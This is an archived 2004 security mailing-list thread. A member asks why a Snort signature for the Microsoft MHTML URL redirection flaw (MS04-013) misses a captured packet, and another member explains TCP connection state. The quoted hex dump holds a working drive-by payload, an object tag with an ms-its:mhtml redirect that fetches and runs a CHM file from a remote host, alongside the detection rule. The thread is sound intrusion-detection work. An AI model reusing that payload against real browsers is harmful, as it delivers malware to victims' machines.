[Intrusions] mhtml signature

Meidinger Chris chris.meidinger at badenit.de
Wed Aug 4 18:45:37 GMT 2004 

Well Lola, 

looking at the nature of the exploit - it comes either in an email message
in an established smtp connection, or as html in an established http
connection - it seems like it would be harmless outside of the context of an
established tcp connection.

connectionless exploits will most likely have at leat one of the following
attributes:

1. attack ip protocol 6 (tcp) itself, rather than the encapsulated data
payload (attack osi layers 1-4 but not 5-7)
2. attack another ip protocol (for example protocol 17, udp, which is
connectionless)
3. attack the ip stack itself (mangle some packet fields to fubar the ip
stack)
4. are local attacks, and have nothing to do with the network.

Cheers,

Chris

> -----Original Message-----
> From: intrusions-bounces at lists.sans.org 
> [mailto:intrusions-bounces at lists.sans.org] On Behalf Of lola marais
> Sent: Wednesday, August 04, 2004 2:18 PM
> To: intrusions at lists.sans.org
> Subject: [Intrusions] mhtml signature
> 
> I have been working on a problem and require the assistance 
> of the broader list community.
> Credit is given to the owner of this signature at
> http://sourceforge.net/mailarchive/message.php?msg_id=7758516
> 
> 
> I am planning on using this signature for a detect in part 2 
> my GCIA practical.
> 
> The problem is that I am not able to get it working 100% with 
> the data that i have. By not working I mean that it will miss 
> the single packet that I have captured.
> 
> I have captured some data from a network using tcpdump. The 
> capture contains the data content required to trigger the 
> event. The capture contains a single packet for that session, no more.
> 
> When I read the data past snort with the signature enabled, 
> then NO alerts are triggered. If I remove the part of the 
> signature "flow:from_server,established" and then pass the 
> same data I have 1 event
> 
> The signature looks for an established connection.
> My question is:
> 
> 1. Why has the author of the signature decide to look for an 
> established connection?
> 2. Does the signature stand a chance of missing some events 
> by looking only for established connections?
> 
> The current version of the signature has the following structure.
> 
> alert tcp any any -> $HOME_NET any (msg:"Microsoft MTHML URL 
> Redirection Attempt"; flow:from_server,established; 
> content:"mhtml|3A|file|3A|"; nocase; 
> reference:cve,CAN-2004-0380; 
> reference:url,www.microsoft.com/technet/security/.../MS04-013.mspx;
> classtype:web-application-attack; rev:2;)
> 
> The data packet that I have captured looks as follows:
> 
> 07/28/04-11:23:51.262652 MAC:removed -> MAC:removed 
> type:0x800 len:0xC2 Proxy:ProxyPort -> InternalHost:4003 TCP 
> TTL:63 TOS:0x0 ID:33030 IpLen:20
> DgmLen:176 DF
> ***AP**F Seq: 0xDC274ADF  Ack: 0x2B3B3965  Win: 0xC1E8  TcpLen: 20
> 0x0000: 00 0A 42 42 80 0A 00 03 32 87 9A 71 08 00 45 00  
> ..BB....2..q..E.
> 0x0010: 00 B0 81 06 40 00 3F 06 2B 92 9E A9 83 0D 9E A6  
> .... at .?.+.......
> 0x0020: CE 52 1F 4C 0F A3 DC 27 4A DF 2B 3B 39 65 50 19  
> .R.L...'J.+;9eP.
> 0x0030: C1 E8 70 F3 00 00 20 20 20 20 3C 6F 62 6A 65 63  
> ..p...    <objec
> 0x0040: 74 20 64 61 74 61 3D 22 26 23 31 30 39 3B 73 2D  t 
> data="&#109;s-
> 0x0050: 69 74 73 3A 6D 68 74 6D 6C 3A 66 69 6C 65 3A 2F  
> its:mhtml:file:/
> 0x0060: 2F 43 3A 5C 66 6F 6F 2E 6D 68 74 21 68 74 74 70  
> /C:\foo.mht!http
> 0x0070: 3A 2F 2F 77 77 77 2E 66 72 65 65 33 32 2E 63 6F  
> ://www.<blocked> free32.co
> 0x0080: 6D 2F 50 4F 50 2E 43 48 4D 3A 3A 2F 73 61 76 65  
> m/POP.CHM::/save
> 0x0090: 61 6E 64 72 75 6E 2E 68 74 6D 22 20 74 79 70 65  
> andrun.htm" type
> 0x00A0: 3D 22 74 65 78 74 2F 78 2D 73 63 72 69 70 74 6C  
> ="text/x-scriptl
> 0x00B0: 65 74 22 3E 3C 2F 6F 62 6A 65 63 74 3E 20 D1 7F  
> et"></object> ..
> 0x00C0: CA 27                                            .'
> 
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
> 
> _________________________________________________________________
> Death to pop-up ads! Get the ultimate toolbar today. 
> http://toolbar.msn.co.za?DI=1054&XAPID=2083
> 
> _______________________________________________
> Intrusions mailing list
> Intrusions at lists.sans.org
> http://www.dshield.org/mailman/listinfo/intrusions
>

More information about the Intrusions mailing list